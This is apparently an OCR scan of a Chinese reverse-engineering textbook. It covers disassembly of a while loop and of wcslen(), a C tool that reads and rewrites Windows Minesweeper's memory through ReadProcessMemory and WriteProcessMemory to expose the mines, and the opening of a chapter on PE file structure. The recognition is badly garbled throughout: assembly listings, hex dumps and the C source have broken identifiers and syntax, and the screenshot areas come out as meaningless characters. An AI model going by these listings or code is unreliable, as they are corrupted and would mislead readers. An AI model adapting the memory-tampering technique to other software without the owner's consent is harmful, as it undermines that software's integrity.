其 text:00401036' TOC WHITE 7 CODE  XRER main+3Ej 
:text:00401036 Cmp [ebp+nNum], 64h 
础 ‘text:0040103A 3 short LOC WHILEEND 
‘text:0040103C TOV eaX，[ebp+nSum] 
PR .text:0040103F add eax, [ebp+nNuml 
‘text:00401042 mov [ebp+nSuml], eax 
.text:00401045 mov ecx, [ebp+nNum] 
.text:00401048 add ecx 击 
.text:0040104B mov [ebpt+nNum], ecx 
‘text:0040104E jmp short LOC WHILE 


.text:00401050 2 -== 一 一 一 = 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
.text:00401050 
.text:00401050 LOC_ WHILEEND: 


CODE XREF: main+2Aj 


text:00401050 mov edx, [ebp+nSum] 

.text:00401053 push edx 

.text:00401054 push offset Format ; "nsum = $d \r\n" 
-text;00401059 al _printf 

text:0040105E add esp, 8 

.text:00401061 XOr eax, eax 


while 循环 的 主要 部 分 全 部 在 LOC WHILE 和 LOC WHILEEND 之 间 。 在 LOC WHILE 
下 面 的 两 句 是 cmp 和 jxx 指令 , 在 LOC WHILEEND 上 面 是 jmp 指令 。 这 两 部 分 是 固定 的 格 


式 ， 其 结构 整理 如 下 : 
;初始 化 循环 变量 等 


LOC_ WHILE: 
Cmp XXxX, XXX 
让 et 
jmp LOC_WHILE 
LOC WHILEEND: 
再 来 看 一 下 IDA 生成 的 流程 图 ， 如 图 5-54 所 示 。 
Inou Febp+nNum] ,1 
nou [ebp*nSun], 9 和 




















> WHILE: 
cmp [ebp*nHum] , 63h 
short Lat WHILEENDL 














eax, [ebp*nSum] 

eax, [ebp*nNum] LOC WITLEENDS 
[ebp*nSum], eax mov edx, [ebp*nSun] 
ecx, [ebp*nMum] push edx 

ECXx, 1 push offset Format DSU Nn" 
Tebp+nhum] , ecx call printf 
Short LOD WHILE add esp, 8 








xor eax, eax 
pop edi 
pop esi 
pop ebx 
add esp, Sah 
cep ebp, esp 
call chkesp 
OU esp, ebp 


ebp 


|_nain endp 





图 5-54 ”while 循环 流程 图 








5.5 逆向 分 析 实 例 





对 于 for 循环 、do 循环 和 while 循环 这 3 种 循环 而 言 ，do 循环 的 效率 显然 高 些 
循环 相对 来 说 比 for 循环 效率 又 高 些 。 

对 于 C 语言 的 逆向 知识 就 介绍 到 这 里 ， 读 者 可 以 自己 多 写 一些 C 语言 的 代码 , 然后 通过 
类 似 的 方式 进行 分 析 ， 从 而 更 深入 地 了 解 C 语言 代码 与 其 反 汇编 代码 的 对 应 方式 。 其 他 语言 
的 反 汇 编 学 习 也 可 以 按照 此 方法 进行 。 


5.5 ”逆向 分 析 实 例 


本 章 从 汇编 语言 的 学 习 、 动 态 调试 、 静 态 分析 和 简单 的 逆向 知识 逐步 介绍 了 软件 安全 的 
入 门 知识 。 本 节 通 过 分 析 几 个 简单 的 例子 来 对 前 面 的 知识 进行 巩固 和 加 深 。 


5.5.1 函数 的 逆向 


wsclen 函数 是 用 来 获取 字符 串 长 度 的 函数 ， 确 切 地 说 ， 是 用 来 获取 UNICODE 字符 串 长 
度 的 函数 ， 其 定义 如 下 : 


Si2e CINOSLenl( Constl Wehar tl tr 

该 定义 取 自 MSDN。wcslen0 〇 函数 的 具体 用 法 ， 这 里 就 不 进行 介绍 了 ， 主 要 看 它 的 反 汇 
编 代码 实现 。 

用 OD 打开 一 个 自己 写 的 程序 , 这 个 程序 里 用 到 了 UNICODE 字符 串 , 也 使 用 了 wsclen() 
函数 来 计算 UNICODE 字符 串 函 数 的 长 度 ， 然 后 在 OD 中 的 wsclen() 函 数 处 设置 断 点 ， 运 行 
程序 。 当 程序 调用 weslen() 函 数 时 , OD 会 被 中 断 , 分 别 查 看 OD 的 反 汇编 窗口 、 转 存 窗口 (也 
称 数 据 窗 口 ) 和 栈 窗 口 ， 如 图 5-55、 图 5-56 和 图 5-57 所 示 。 


， 而 while 


wcslen E 








BOFFE | mov LL 
VIENIFUE | 站 | Pugh ebp 
SBEC Ray 
| agys mow ei i RE 
$66:8808 Nou x, Word ptr Teax] 
A eax 
为 煌 














Bp S57 OOD Do 5 愉 人 0 73 ou 7 人 录 相 73 8 Ve) 09| 0., Ns + 由 v 艺 
东信 首 攻 前 作 | 人 东信 他 相对 作 让 四 st 示 介 帮 权 作 前 区 他 全 学 性 站 和 | 到- 柯 。 3: 业 , -ND 
| 65 站 了 和 Qt 和 -得 : 动 > 妹 。 和 和 
和 寺 122 太 思 办 前 | 人 全 各 从 自 直人 于 村 竹村 和 组 各 个 ”合生 称 和 从重 人 机 站 向 红 间作 nf 
由 和 六 让 汪汪 让 玫 D 证 让 是 扩 册 是 是 让 玉民 认 归 测 是 让 是 出 报时 小 晤 由 是 





#r PY 
丰登 | 和 
从 趟 之 大 让 丰 | 6 区 









rr 9912F9u | 
BT2ETRC | Be12F478 | 
12E118| 8912F25C| 

0612E344| B0492AEQ| UDisk_Nu-995928E9 





BA+2E118| 903976E9| 
O12E11C, A012F490) UNICODE "0:\WINDOWS\systend2\notepad exe 
W012E120, 080787D8| 
DHT2E129) O0160085) 
图 5-57 栈 窗 口 





童 盯 可 谨 啊 狂 山中 册 


] 
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位 寻 可 谋 啊 酒 山 目 小 


中 


从 图 5-57 中 可 以 看 出 ，wcslen(0) 函 数 的 参数 是 “ci\windows\system32\notepad.exe” 这 个 
UNICODE 字符 串 。 图 5-56 中 显示 了 wcslen() 函 数 参 数 的 内 存 情况 。 图 5-55 是 wcslen() 函 数 
的 反 汇编 代码 。 

wcslen() 函 数 的 反 汇 编 代码 如 下 : 


MNCL TRO mm 8BEF mov edi, edi 

WL Tp sl push ebp 

A i oy 8BEC mov ebp, es 

Wa hb i 8B45 08 moV eax, dword ptr [ebp+8] 
WA i | 66:8B08 mov cx WOrd Btr (eax 
TEETER 40 ne eax 

THIEL TEDS 40 ne eax 

TICLEDS. 663850C9 test ER OR 

RT 克 本 本 全 人 ol short 77CTYBRD3 
TCDR 2B45 08 sub eax, dword ptr [ebp+8] 
PTCLTEEL DLPE8 sar eax, 1 

WIET TERS 48 dec eax 

77C17FE4 5D pop ebp 

A @3 retn 


在 OD 中 使 用 F8 单 步 到 77C17FD4 地 址 处 , 查看 寄存 器 eax 的 值 。eax 的 值 保存 的 是 
wcslen() 函 数 的 参数 。 其 实 通 过 “mov eax, dword ptr [ebp + 8] ”就 能 够 看 出 eax 被 赋值 为 





wecslen() 函 数 的 参数 值 。 
TICLNEDA 66:8B08 mov Cr WoOrd Ber [eaxi 
VICL TEDDY 40 inc eax 
CNTIFDS 40 1ne Eax 


上 面 3 句 反 汇编 代码 是 eax 地 址 处 的 2 字 节 的 内 容 赋值 给 cx 寄存 器 , 然后 将 eax 的 地 址 
连续 加 两 次 1。 

TELNEDS 0:8509 全 二 区 风 瑟 和 

Wi el! gl i 4 shoxrtl MOLTFDS 


上 面 2 句 反 汇编 代码 是 测试 cx 中 的 内 容 是 否 为 0。UNICODE 字符 串 是 以 两 个 0 来 进行 
结尾 的 。 如 果 不 为 结束 的 话 ， 说 明 还 没有 到 UNICODE 字符 串 的 结尾 ， 那 么 就 跳 转 到 77C17FD4 
地 址 处 ， 再 次 执行 “mov cx, word ptr [eax]” 指 令 。 这 个 循环 是 逐个 授 历 UNICODE 字符 串 ， 








直到 字符 串 结束 为 止 。 
TTONY HDD B43"08 sub eax, dword ptr [ebp+8] 
WN on pt nl DiF8 sar eax, 1 
7 48 dec eax 


当 上 面 的 循环 遍历 完整 个 UNICODE 字符 串 后 ，eax 的 值 指向 了 字符 串 结尾 的 两 个 0 后 
面 的 地 址 位 置 。 因 为 从 77C17FD4 到 77C17FD8 这 三 个 地 址 处 的 代码 可 以 看 出 ， 该 函数 是 先 
取 字 符 串 中 的 内 容 ， 再 修改 UNICODE 指针 的 地 址 。 这 样 当 取 到 字符 串 的 结尾 地 址 后 ， 再 修 
改 字 符 串 指 针 地 址 ， 则 指针 会 指向 字符 串 结 尾 的 两 个 0 后 面 的 地 址 。 
在 77C17FDE 处 ， 将 eax 的 地 址 (也 就 是 字符 串 结尾 两 个 0 后 面 的 地 址 〉 减 去 字符 串 的 
起 始 地 址 ， 就 得 到 字符 串 所 占用 的 内 存 字 节 数 。 在 计算 机 中 ， 二 进 制 位 左 移 一 位 ， 相 当 于 乘 
2; 右 移 一 位 ， 相 当 于 除 以 2。 在 77C17FEI 中 ，sar 指令 是 将 目的 操作 数 进 行 右 移 运算 。“sar eax， 
1” 是 将 eax 中 的 值 除 以 2， 并 将 结果 保存 在 eax 中 。 字 符 串 用 UNICODE 方式 进行 存储 ，1 
个 字符 占用 2 字 节 ， 那 么 将 所 占用 的 内 存 数 除 以 2 也 就 得 到 了 字符 串 的 字符 个 数 。 而 “dec 
eax” 的 作用 是 将 eax 的 值 减 一 ， 将 结果 保存 在 eax 中 。 为 什么 要 减 一 呢 ? 其 实 前 面 已 经 提 到 
了 ， 这 里 不 再 说 明 ( 想 想 前 面 的 循环 结束 后 ，eax 指向 的 位 置 )。 

最 后 ， 自 己 实现 一 个 weslen(0) 函 数 。 为 了 使 其 看 起 来 像 反 汇编 代码 ， 将 其 写 得 稍微 复杂 
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些 ， 有 具体 如 下 : 
#define UNICODE 
#define UNICODE 


#include <Windows.h> 
#include <stdio.h> 
#include <tchar.h> 


int MyWcslen(const wohar t *wText) 


wchar 七 *wpChar = (wchar 七 *)wText; 
wchar_ t wChar; 
int iNum = 0; 


do 
{ 
wOhar = *wpChar; 
wpChar += 1 
} while ( wehar != 0 ) 7， 
Nam = (BYTE 2)wpOlar my (BYTE +) whext, 


iNum /= 2; 
Nm 二 二 


return iNum,; 


int main() 
wcehar, t, *whext = "TEXT("hello world”); 
printf("$%d \r\n", weslen(wText)); 
printf/("%d \r\n", MyWcslen (wrext)); 


return .03 


} 


5.5.2 ”扫雷 游戏 辅助 工具 


扫雷 游戏 是 Windows 系统 自 带 的 小 游戏 , 貌似 从 Win95 开始 就 已 经 存在 了 , 看 来 非常 经 
典 和 受 欢 迎 。 扫 雷 游戏 的 辅助 工具 ， 网 上 有 很 多 ， 而 且 它 本 身 就 存在 后 门 ， 可 以 让 玩家 判断 
当前 是 否 是 雷 。 本 部 分 针对 扫雷 游戏 来 做 一 个 简单 的 能 够 读 取 雷 分 布 的 工具 。 

1， 扫雷 的 简单 分 析 

Windows 对 消息 的 处 理 是 在 窗口 过 程 中 完成 的 。 一 般 情况 下 ， 通 过 分 析 对 API 函数 的 调 
用 都 可 以 找到 窗口 过 程 的 地 址 。 通 过 分 析 RegisterClassEx0、DialogBoxParam(0) 等 函数 ， 都 可 
以 找到 窗口 过 程 的 地 址 。 

扫雷 程序 是 由 VC7 进行 开发 的 , 使 用 OD 加 载 扫雷 程序 ， 其 完整 路 径 为 C:\Windows\Sys 
tem32\Winmine.exe。 用 OD 载 入 扫雷 程序 以 后 ， 入 口 点 停留 在 01003E21 地 址 处 ， 停 留 的 位 
置 处 于 启动 代码 处 ， 而 不 是 真正 的 主 程序 处 。VC 开发 的 程序 基本 都 可 以 通过 exit() 函 数 往 上 
找到 第 1 个 CALL， 如 图 5-58 所 示 。 

直接 按 F4 键 运行 到 01003F90 地 址 处 对 主 函 数 调用 的 CALL 指令 上 ， 然 后 按 F7 键 单 步 
步 入 至 主 函 数 的 反 汇 编 代码 处 。 在 主 函 数 的 入 口 处 向 下 可 以 看 到 对 RegisterClassW() 函 数 的 调 
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用 。 这 里 注册 了 窗口 类 ， 需 要 找到 对 窗口 过 程 的 地 址 。 在 调用 RegisterClassW() 函 数 前 是 大 量 
的 赋值 语句 。 在 这 些 语句 中 ， 只 有 0100225D 地 址 处 的 MOV 指令 的 源 操作 数 看 起 来 是 个 地 
址 。 猜 测 这 里 是 窗口 过 程 的 地 址 ， 如 图 5-59 所 示 。 


eax, Word per fel 
short 91983F89 
byte ptr [esi]， 
short 91963F58 
esi 


童 膝 相 许 呈 泪 山上 四 小 


948893ER8| Short 01003F7B8 ~ 
94883F86| | 
12 全 | | 
test () 函数 往 上 找 一 个 CALL 
就 是 调用 主 函数 的 CALL 


- 8975 84 
- 395D E4# 


esi 

‘dword ptr [<&nsuvucrt .exit>] 
short 91693FDB 
eax, dword ptr [ebp~14 
ecx, dword ptr [eax] 


ecx, dword ptr [ecx] 
: ECX 


HIDH3FBS! 。 58 Lpush Bax 


图 5-58 通过 exitO) 函 数 找 主 函数 











































- - re -一 
B188224F|| 。 68 887F8888 |push 7FBY RsreName = IDC_ARROY 
Q186225#|| - | Push edi hinst 

B1982255|| . fA3 285B8881 |mou 

184225A|| .。 897D Bs mou 

人 86225D|| . C745 B8 C91B1mov 

B1882254|| . 897D BC | mou 

B1882267|| 。 897D C6 | mou ed 

MTH82258|| 。 894D C | mou ，ecx ” 窗 晶 过程 地 址 
8198226D|| 。 8945 C8 | mov jy 各， 

B1982278|| . FF15 BCT99901 Gai dword ptr [<8&USER32.LoadCursorWi LiLoadCursorty 
W182276|| 。 53 push NbjType 
84992277|| 。 8945 CC | mov eax [ 

B188227A|| . FF15 6810000 Wa GetStock0objelLeetStock0bject 
NTGt2286|| - 8945 DO mov x 

4862283|| 。 8D45 BA | lea 

Bt62285|| . BE R9569991 | mou 

BTBB228E|| - 58 push pWDdGLass 
S18W2286|| .。 897D D4 mov 

B10w228F|| . 8975 D8 mov twor e ,esi 

819082292|| . FF15 cc19986 Ba dword ptr [<&USER32.RegisterCla!LRegisterCtlassW 














图 5-59 调用 RegisterClassW0O 函 数 


直接 按 Ctrl+G 组 合 键 到 01001BC9 地 址 处 ， 可 以 看 到 这 里 的 函数 非常 大 。 需 要 找到 
WM_LBUTTONDOWN 和 WM_LBUTTONUP 两 个 消息 。 这 两 个 消息 是 用 来 处 理 鼠 标 左 键 按 
下 和 鼠标 左 键 抬 起 的 事件 。 分 别 在 WM_LBUTTON DOWN 和 WM LBUTTONUP 消息 上 下 
断 点 ， 如 图 5-60 所 示 。 

按 下 F9 键 让 扫雷 运行 起 来 ， 在 扫雷 游戏 中 的 雷 区 单 击 鼠 标 左 键 ， 此 时 OD 的 WM_ 
LBUTTONDOWN 地 址 处 的 断 点 会 被 断 下 。 继 续 按 F9 键 运行 ， 回 到 扫雷 游戏 界面 ， 发 现 刚 
才 单 击 的 位 置 没 有 发 生 任何 改变 ， 且 WM_LBUTTONUP 消息 未 被 断 下 。 可 以 猜测 改变 雷 区 
格子 状态 的 处 理 代码 在 WM_LBUTTO NUP 消息 中 ， 而 并 非 在 WM_LBUTTONDOWN 消息 
中 ， 因 此 取消 WM_LBUTTONDOWN 处 的 断 点 。 


一 











5.5 ”逆向 分 析 实 例 





MTF- | 8910 985T989ROV dword ptr [1605148], ebx 
HOFAT| .| E9 B9888890 
| > S3930 wasigog cmp -dword ptr [1895448], edit 
HTHOTFAD 村 [5 D 
» FF75 14 | push 
|. Es s6FaFFFF | B108140C 
-。 85C8 test ~ eax, eax 
| eF85 aeFCFFFI jnz 8198155E 


。 SN1B 人 test byte ptr [1995998] ，b1 
.8E84 DFetagal je 
mov 





Cases 282 (WM LBUTTONUP) ,| 
-> 93D 40> T9000 cmp 
1- 9F84 BC919091 je 
893D 4051000) mov dword ptr [1805148], edi 
. FF15 08199601 BN dword ptr [<&USER32.ReleaseCapti[ReleaseCapture 
vl-. ss14D Bas8008 test byte ptr [19858908], bl 
-| OF84 B608000| je B816892688 








5 |. Ee 0D7179998 _'B 0108937E1 | 


miou2non | Fo 959619009 jnp 68621R9 


图 5-60 对 鼠标 左 键 消息 设置 断 点 


取消 WM_LBUTTONDOWN 消息 后 ， 再 次 回 到 扫雷 游戏 中 的 雷 区 单 击 鼠 标 左 键 ，OD 再 
次 被 断 下 ， 这 次 被 断 下 的 位 置 在 WM_LBUTTONUP 消息 的 地 址 处 。 按 F8 键 单 步 至 01002005 
地 址 处 的 call 010037E1 指令 处 ， 然 后 按 F7 键 进 入 该 函数 ， 继 续 按 F8 键 单 步 跟 踪 至 0100389B 
地 址 处 ， 如 图 5-61 所 示 。 


1 byte ptr 
di, ng 


short BTB938B6 
di1, 1F 
dd， 广 
Short B19038B6 





图 5-61 雷 区 分 布地 址 


按 Ctrl + G 组 合 键 在 数据 窗口 查看 01005340 地 址 处 的 内 容 ， 如 图 5-62 所 示 。 






















EE 
01085916| eg 9g 99 99 60 80 96 980 99 99 69 99 69 99 99 90 

BTH95328 80 69 060 90 

98533 89 98 99 99 

S195348 19 10 19 18 19 19 19 19 19 19 18 19 19 18 18 18 Mn LT 
641805358| 19 19 19 18 18 19 19 19 19 19 18 19 19 18 18 1 人 | 全 有 [LT 
fgs36a 19 BF SF GF OF OF OF SF SF OF OF OF OF OF SF SF smmi 塞 0?? 客 
B1695978| BF BF BF OF OF BF OF OF OF GF BF SF GF OF OF +18| ?NN 
1085388 19 BF OF OF OF BF OF SF OF OF OF BF SF OF BF 9F gun 
01935398 BF SF BF OF OF SF OF OF OF OF BF BF SF OF SF 10 E72 
1005386) 19 GF GF OF SF OF OF 9F SF OF OF OF OF OF QF 9F mMNO?N | 
G1095300 GF OF OF OF 8F OF OF OF OF OF OF OF OF OF OF 16) DM? ma | 
SIR053C08 18 BF BF OF OF OF BF OF OF 8F OF BF OF QF SF 9F | 和 用 ?和 | 
A19953D6 @F SF OF BF SF OF OF OF OF BF BF SF SF SF SF 18| Ban? 
(08053E6 16 BF 8F BF OF OF SF OF OF 8F 9F SF SF 9F SF GF| Ba???UN? | 
MB053F6| er OF OF SF SF OF OF OF OF OF OF OF OF OF OF 18 Dann 


图 5-62 雷 区 分 布 


从 图 5-62 中 可 以 看 到 ,数据 窗口 中 非常 整齐 且 看 似 有 序 地 排列 着 一 些 数据 。 这 里 就 是 雷 
区 的 分 布 。 雷 区 的 分 布 从 01005340 地 址 处 开始 ， 从 雷 区 的 起 始 地 址 处 往 前 16 字 节 是 雷 的 数 
量 、 雷 区 的 矩阵 的 宽 和 高 。 在 图 5-62 中 , 01005330 地 址 处 保存 着 雷 的 数量 63 (十 进 制 的 99)， 
宽 是 IE (十进制 的 30)， 高 是 10〈 十 进 制 的 16)。 从 地 址 01005340 开始 的 数据 进行 复制 ， 
可 以 看 到 01005340 地 址 处 的 数据 是 连续 的 10。 从 这 里 开始 , 一 直 复 制 到 一 串 连 续 的 10 地 址 
处 。 这 里 从 01005340 地 址 处 一 直 复 制 到 0100557F 地 址 处 ， 将 复制 出 来 的 数据 粘贴 在 记事 本 
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中 ， 并 进行 整理 ， 结 果 如 图 5-63 所 示 。 


- 

时 畦 办 纺 生 罗 困 轨 轩 世 

村 号 妥 争 号 各 是 肌 有 生生 思 币 遇 半 
上 放 二 让 证 证 让 证 下 必 证 症 站 二 让 
上 

号 号 癌 

省 

一 

二 

半 

车 

提 

上 

轨 号 号 叶 辣 


EEE EE 
EE EE EE EE EE EE 


EE 

EE EELEEE EEEE EE 

车 是 妥 导 且 号 委员 届 叶 羽 己 号 己 急 与 妥 辣 
EEEEEEEE 


名 
号 号 号 殷 号 笠 
2 


18 
SF 
aF 
oF 
SF 
SF 
ef 
SF 
oF 
OF 
BF 
SF 
8F 
BF 
BF 
BF 
BF 


EE EEEE ELE 
EEEEELEEEEEE ELE 
EE 下 和 
EE 
汪 轨 加 扫 办 办 交 轩 妆 办 叶 和 呈 人 人 
和 
EE EE EE 
EEEEEEE EEEEEEEE 
EE 
EE 
EE EE ELE 
EEEEEEELELEELEEE 
EE 
世 导 号 马 号 急 号 号 忆 马 急 己 生生 且 曙 号 
EE 
EEEEEEEEEEEE EE 
EE 
EEEEEEELEEE 
二 世人 SSE 


号 号 号 号 号 


EE EE 
EE 


加 
加 
己 
a 
加 
2 
= 
2 
s 
2 
= 
2 
Fe 
2% 
地 
2 
加 
名 
2 
所 
2 
可 
= 
i 
已 
2 
名 
S 
2 
全 





图 5-63 雷 区 分 布 及 相关 地 址 


从 图 5-63 中 可 以 看 出 ， 雷 区 的 分 布 是 一 个 矩阵 ， 在 所 有 数据 的 最 外 围 全 部 是 10， 这 表示 
雷 区 周围 的 墙 。 切换 到 扫雷 游戏 ， 从 左上 角 开 始 单 击 鼠 标 左 键 ， 然 后 观察 内 存 中 的 值 ， 依 次 
进行 测试 ， 得 出 结果 为 : 10 代表 墙 ，OF 代表 空白 ，8F 代表 雷 ，8E 代表 旗 。 由 此 可 知 ， 只 要 
将 雷 区 中 的 8F 的 位 置 全 部 找到 ， 即 可 找到 全 部 的 雷 。 

至 此 ， 对 扫雷 的 分 析 结 束 。 接 下 来 通过 编写 程序 找 出 扫雷 游戏 中 全 部 的 雷 。 

2. 辅助 工具 编写 

扫雷 游戏 中 雷 的 布局 是 随机 的 。 通 过 多 年 玩 扫 雷 的 经 验 发 现 ， 每 局 的 第 1 次 都 不 会 因为 
扫 到 雷 而 爆 掉 。 因 此 ， 推 断 雷 的 布局 是 在 每 1 局 的 第 1 次 单 击 后 进行 随机 分 布 的 。 那 么 ， 每 
次 使 用 程序 时 ， 应 该 先 在 扫雷 游戏 中 单 击 1 次 鼠标 左 键 。 

由 于 对 扫雷 游戏 进行 了 分 析 ， 而 编写 的 代码 中 基本 都 是 前 面 章节 的 知识 ， 这 里 直接 来 看 代码 : 


#include <Windows.h> 
#anoclude 二 So 


int maln(int arnge, char argy hl) 


{ 
// 找到 扫雷 游戏 对 应 的 窗口 句柄 和 进程 ID 
HWND hwinmine = Einaninaow(NUILEE，" 扫 雷 ") 
DWORD dwPid = 0; 
GetWindowThreadProcessId (hWinmine, &dwPid); 


// 打开 扫雷 游戏 获取 其 句柄 

HANDLE hProcess = OQpenProcess (PROCESS ALL ACCESS, FALSE, dwPid); 
PBYTE pByte = NULL; 

DWORD dwHight = 0, dwWidth = 0; 


DWORD dwAddr = 0x010053307 
DWORD dwNum = 0; 
DWORD dwRead = 0; 


// 读 取 雷 的 数量 级 
// 读 取 雷 区 的 宽 和 高 


ReadProcessMemory (hProcess, 


(LPVOID} (GwAddr), 


&dwNuam, Sizeof (DWORD), &dwRead); 


ReadProcessMemory (hpProcess, 
&dwWidth, 
ReadProcessMemory (hProcess, 
&dwHight, 


(LPVOID) (dwAddr + 4)， 
sizeof (DWORD), &dwRead); 
(LPVOID) (dwAddr + 8), 
sizeof (DWORD), &dwRead); 





5.5 逆向 分 析 实 例 





// 本 代码 只 针对 扫雷 的 高 级 级 别 

// 因此 需要 判断 一 下 高 和 宽 

if ( awWiath != 30 || dwHight != 16 ) 
. 


】 


DWORD dwBoomAddr = 0x01005340; 

// dwWidth * dwHight = 游戏 格子 的 数量 

// dwWidth * 2 = 上 下 墙 

1/ dwHight * 2 = 左右 增 

// 4 = 4 个 角度 墙 

DWORD dwSize = dwWidth * dwHight + dwWidth * 2 + dwHight * 2 + 4; 
BByte = (PBYTE)malloc (dw3ize); 


/7 读 取 整 个 雷 区 的 数据 

ReadProcessMemory (hProcess, (LPVOID)dwBoomAddr, pByte, dwSize, &dwRead); 
BYTE, bEClear'= 0Dx8E/ 

of le 0 

int n = dwNunm; 

whileé( 1 < dwSize ) 


{ 


return 0; 


if ( pByte[i] == OxB8F ) 
{ 
DWORD dwAddr1 = 0x01005340 + 4; 


WriteProcessMemory (hProcess, (LPVOID) dwAddri1, 
tbClear, sizeof (BYTE), &dwRead); 


// 刷新 扫雷 的 客户 区 

0 

GetClientRect (hWinmine, &rt); 
InvalidateRect (hWinmine, g&rt, TRUE); 
treelBByte) 

Brints( se Ve Nn a 

‘CloseHandle (hProcess); 


return 05; 
和 


以 上 就 是 整个 扫雷 的 辅助 工具 的 源 代码 ， 效 果 如 图 5-64 所 示 。 






图 5-64 雷 的 分 布 
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该 辅助 工具 无 法 完成 扫雷 的 工作 ， 虽 然 雷 的 分 布 都 已 经 找到 ， 但 是 时 间 仍 然 在 继续 ， 剩 
下 的 工作 交 给 读者 自行 分 析 。 


5.6 和 总结 


本 章 介 绍 了 汇编 语言 、OD 动态 调试 分 析 工 具 、IDA 静态 逆向 分 析 工 具 和 C 语言 对 应 的 
反 汇 编 结构 ,最 后 介绍 了 两 个 简单 的 实例 。 关 于 逆向 的 知识 和 技术 是 在 实践 中 不 断 进 行 积累 ， 
从 量变 到 质变 。 















| 加密 与 解密 


加 密 与 解密 ， 简 单 来 说 ， 主 要 就 是 逆向 与 调试 。 这 些 知识 在 前 面 的 章节 已 经 介绍 过 了 ， 
而 掌握 本 章 的 知识 以 后 会 提高 逆向 与 调试 的 能 

PE 结构 是 Windows 下 可 执行 文件 的 标准 结构 ， 可 执行 文件 的 装载 、 内 存 分 布 、 执 行 等 
都 依赖 于 PE 结构 ， 而 在 逆向 分 析 软 件 时 ， 为 了 有 目的 、 更 高 效 地 了 解 程 序 ， 必 须 掌 握 PE 结 
构 。 要 掌握 反 病毒 、 免 杀 、 反 调试 、 壳 、PEDIY 等 相关 知识 ，PE 结构 更 是 重 中 之 重 。 

调试 API 函数 是 Windows 系统 给 程序 员 提 供 的 调试 接口 ， 掌 握 调试 API 函数 即 掌握 了 
Windows 的 调试 原理 。 利 用 调试 API 函数 可 以 做 到 加 载 程序 、 调 试 程序 、 获 取 进 程 的 底层 信 
息 、 线 程 的 运行 环境 等 信息 。 


6.1 PE 文件 结构 


PE (Portable Executable)， 即 可 移植 的 执行 体 。 在 Windows 平台 (包括 Win 9x、Win NT、 
Win CE……) 下 ， 所 有 的 可 执行 文件 (包括 EXE 文件 、DLL 文件 、SYS 文件 、OCX 文 
件 、COM 文件 ……: ) 均 使 用 PE 文件 结构 。 这 些 使 用 PE 文件 结构 的 可 执行 文件 也 称 为 
PB 大 作 ， 

普通 的 程序 员 也 许 没 有 必要 掌握 PE 文件 结构 ， 因 为 其 大 多 是 开发 服务 性 、 决 策 性 、 辅 
助 性 的 软件 ,比如 MIS、HIS、CRM 等 软件 。 但 是 对 于 学 习 黑 客 编 程 和 学 习 安全 编程 的 Hacker、 
Cracker 和 Programmer 的 人 而 言 ， 掌 握 PE 文件 结构 的 知识 就 非常 重要 了 。 


6.1.1 PE 文件 结构 全 貌 


Windows 系统 下 的 可 执行 文件 中 包含 着 各 种 数据 ， 包 括 代 码 、 数 据 、 资 源 等 。 虽然 Windows 
系统 下 的 可 执行 文件 中 包含 着 如 此 众多 类 型 的 数据 ， 但 是 其 存放 都 是 有 序 、 结 构 化 的 ， 这 
完全 依赖 于 PE 文件 结构 对 各 种 数据 的 管理 。 同 样 ，PE 结构 是 由 若干 个 复杂 的 结构 体 组 合 
而 成 的 ， 不 是 单单 的 一 个 结构 体 那么 简单 ， 它 的 结构 就 像 文件 系统 的 结构 是 由 多 个 结构 体 
组 成 的 。 

PE 结构 包含 的 结构 体 有 DOS 头 、PE 标识 、 文 件 头 、 可 选 头 、 目 录 结 构 、 节 表 等 。 要 掌 
握 PE 结构 必须 对 PE 结构 有 一 个 整体 上 的 认识 ， 要 知道 PE 结构 分 为 哪些 部 分 ， 这 些 部 分 大 
概 是 起 什么 作用 的 。 有 了 宏观 上 的 概念 以 后 ， 就 可 以 深入 地 对 PE 结构 的 各 个 结构 体 进行 细 
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致 的 学 习 了 。 下 面 给 出 一 张 图 ， 让 读者 对 PE 结构 有 
个 大 概 的 了 解 ， 如 图 6-1 所 示 。 

从 图 6-1 中 可 以 看 出 ，PE 结构 分 为 4 大 部 分 ， 其 
中 每 个 部 分 又 进行 了 细 分 ， 存 在 若干 个 小 的 部 分 。 从 


PE 头 






数据 管理 的 角度 来 看 ， 可 以 把 PE 文件 大 致 分 为 两 部 ~ 

分 ，DOS 头 、PE 头 和 节 表 属于 PE 文件 的 数据 管理 结 

构 或 数据 组 织 结构 部 分 , 而 节 表 数 据 才 是 PE 文件 真正 ee 

的 数据 部 分 ， 其 中 包含 着 代码 、 数 据 、 资 源 等 内 容 。 a 二 二 Sa 呈 
前 面 的 章节 进行 北向 分 析 时 , 是 对 其 代码 、 数据 、 串 

资源 等 具体 数据 进行 分 析 ， 也 就 是 图 6-1 的 “ 节 表 数 





节 表 数据 一 (代码 
据 ” 部 分 。 程 序 在 内 存 中 或 文件 中 的 组 织 结构 是 如 何 


规划 的 , 并 没有 去 具体 了 解 , 而 这 部 分 内 容 正 是 图 6-1 


的 上 面 3 部 分 内 容 。 本 章 中 关于 PE 结构 的 内 容 主 要 图 6-1 PE 结构 总 览 图 
就 是 针对 图 6-1 的 上 面 3 部 分 进行 介绍 的 。 


6.1.2 PE 结构 各 部 分 简介 


根据 图 6-1 给 出 的 PE 结构 总 览 图 先 来 大 致 了 解 一 下 每 部 分 的 作用 ， 然 后 进行 深入 讲解 ， 
最 后 完成 一 个 PE 结构 的 解析 器 。 这 里 不 会 介绍 PE 结构 中 的 每 个 结构 ， 只 针对 常用 和 相对 重 
要 的 结构 体 进行 介绍 。 

1. DOS 头 

DOS 头 分 为 两 部 分 ， 分 别 是 “MZ 头 部 ”和 “DOS 存根 ” MZ 头 部 是 真正 的 DOS 头 部 ， 
由 于 其 开始 处 的 两 个 字 节 为 “MZ” 因此 DOS 头 也 可 以 叫 作 MZ 头 。 该 部 分 用 于 程序 在 DOS 
系统 下 加 载 ， 它 的 结构 被 定义 为 IMAGE _ DOS_HEADER。 

DOS 残留 是 一 段 简单 的 程序 ， 主 要 用 于 输出 “This program cannot be run in DOS mode.” 
类 似 的 提示 字符 串 。 

为 什么 PE 结构 的 最 开始 位 置 有 这 样 一 段 DOS 头 部 呢 ? 关键 是 为 了 该 可 执行 程序 可 以 兼 
容 DOS 系统 。 通 常情 况 下 ，Win32 下 的 PE 程序 不 能 在 DOS 下 运行 ， 因 此 保留 了 这 样 一 个 
简单 的 DOS 程序 用 于 提示 “不 能 运行 于 DOS 模式 下 ”。 不 过 该 DOS 存根 是 可 以 通过 连接 参 
